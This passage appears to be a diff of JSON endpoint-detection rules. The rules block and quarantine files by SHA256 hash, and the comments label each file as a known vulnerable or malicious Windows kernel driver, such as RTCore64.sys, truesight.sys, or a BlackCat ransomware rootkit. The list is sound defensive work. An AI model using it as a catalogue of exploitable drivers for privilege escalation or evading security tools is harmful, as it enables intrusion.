"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.453205Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "94c226a530dd3cd8d911901f702f3dab8200d1d4fdc73fcb269f7001f4e66915", + "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c28e38a4-5fa1-5eb8-8701-01e047946cac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619229Z", + "creation_date": "2026-03-23T11:45:29.619231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129", + "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c2b018f5-4749-598c-b84b-e4bdd71ef414", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815544Z", + "creation_date": "2026-03-23T11:45:31.815546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815551Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c8f3e786fada6226e6765bdd85e1383feb276ba457f4874f5932c9e0ebc176ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c2b46b68-33a6-50a4-99c9-d9e2365caabe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473543Z", + "creation_date": "2026-03-23T11:45:30.473546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473555Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [],
+ "type": "hash",
+ "value": "148ca220316fe9a0af2b12ed9528273295009d8568bf4c47fbfd4605f0ce2acc",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2b9de64-b7bc-59a9-9915-0696085e38ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.476079Z",
+ "creation_date": "2026-03-23T11:45:30.476082Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.476090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7f84f009704bc36f0e97c7be3de90648a5e7c21b4f870e4f210514d4418079a0",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2bc276f-7974-5c52-9b73-4eb008a89007",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144598Z",
+ "creation_date": "2026-03-23T11:45:31.144600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "be14b834a7208b4bdfbd972430982b50271cf4eef50b73e36b1ba5f2d47eef3a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2c57492-388f-561d-8779-989c2498c93e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458401Z",
+ "creation_date": "2026-03-23T11:45:30.458404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "37b9fbd6547091b83b2595bb0f9f9035ae95111868a4393aab52bf22087233d7",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2c6548c-680e-5b35-9e53-db1ab90eac01",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972891Z",
+ "creation_date": "2026-03-23T11:45:29.972892Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972898Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b",
+ "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2c77f36-8901-565b-9684-4b8747327f9a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809365Z",
+ "creation_date": "2026-03-23T11:45:31.809368Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809377Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72ed058bd82712b99fc7f4be1d1d21e2bebb3e00bfa02f6decd88b0a355bbd3d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2d2eef3-9c16-5345-968b-2828e6108998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827402Z",
+ "creation_date": "2026-03-23T11:45:31.827404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827412Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1b64ad2118cbfab21d5033127e54c554abcf83d831bf1b838fbce813a0611b72",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2ec77ed-0df3-517a-ad26-28ce94297c62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824138Z",
+ "creation_date": "2026-03-23T11:45:30.824141Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824146Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cbefbb040e8596db4da7450d5823d8708493c1328a57202e86d21b72f7d14eab",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2f7b5c9-43b5-5f42-b385-58330df686d0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479912Z",
+ "creation_date": "2026-03-23T11:45:31.479916Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479926Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43483edb6a5f8b94df4660b0b7e907d7e9d6aa64de8999c17181e87d58203571",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c2f92672-4708-5db3-8d59-4b34fad11fe0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985502Z",
+ "creation_date": "2026-03-23T11:45:29.985504Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985510Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0527451d72ba02db8479ea69689350cc563b939bb2cc685386719ab32b7e2772",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c300dbfb-a7db-5fff-9096-cfc2bdce8cb0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460522Z",
+ "creation_date": "2026-03-23T11:45:30.460525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460534Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c181ce9a57e8d763db89ba7c45702a8cf66ef1bb58e3f21874cf0265711f886b",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c307edb6-2ce6-5c6f-a701-a46e214e8348",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481748Z",
+ "creation_date": "2026-03-23T11:45:30.481750Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481756Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "223f61c3f443c5047d1aeb905b0551005a426f084b7a50384905e7e4ecb761a1",
+ "comment": "Vulnerable Kernel Driver (aka cg6kwin2k.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c31428c3-3159-57dc-bb8a-982f0d64d27d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829149Z",
+ "creation_date": "2026-03-23T11:45:30.829151Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829157Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "58be5999562f2541e29eb5a0890637a4a1b78df9ba96637475772ce4a67da4d3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3237d36-c384-558b-8653-4fda838c57ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979030Z",
+ "creation_date": "2026-03-23T11:45:29.979031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x64.sys) [https://www.loldrivers.io/drivers/48bc2815-85ec-4436-a51a-69810c8cb171/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c33020aa-b4ab-5491-815d-514375805cf9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145372Z",
+ "creation_date": "2026-03-23T11:45:32.145375Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e1123b59a801e243a64270d0c6ab1277e5e3afba9c19023807409f53c1b0204b",
+ "comment": "Malicious Kernel Driver (aka driver_e1123b59.sys) [https://www.loldrivers.io/drivers/11a73c42-26aa-446b-8560-43eecb265091/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c33a6738-3af8-5162-8bda-a0d4c42f5d74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967986Z",
+ "creation_date": "2026-03-23T11:45:29.967988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13b82d81d6eac1a8b2e4655504dabecbd70673cdf45c244702a02f3397fdff9a",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c33e74d6-bd7d-517f-8a60-b158f141b597",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458222Z",
+ "creation_date": "2026-03-23T11:45:30.458225Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "003e61358878c7e49e18420ee0b4a37b51880be40929a76e529c7b3fb18e81b4",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c34674da-9ffe-5dd6-b627-4a05475a69d6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.986101Z",
+ "creation_date": "2026-03-23T11:45:29.986103Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.986109Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6ce1073705194870175a8b9c9ebbbb7ad54df81849b111588ea8aeef910da987",
+ "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3534a7c-5a06-5327-b21d-a3e0bd091c06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159474Z",
+ "creation_date": "2026-03-23T11:45:31.159476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159483Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "997cffe72ff84747a895dd9e18c533cc52d3b655071dcbe24e9834368d6adcf3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c3595160-9bb3-5eb4-af75-b8e3117b56aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610318Z",
+ "creation_date": "2026-03-23T11:45:29.610319Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610325Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "26e3bfef255efd052a84c3c43994c73222b14c95db9a4b1fc2e98f1a5cb26e43",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c35f99ca-4745-544c-8bf7-9d1e46f9e8d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
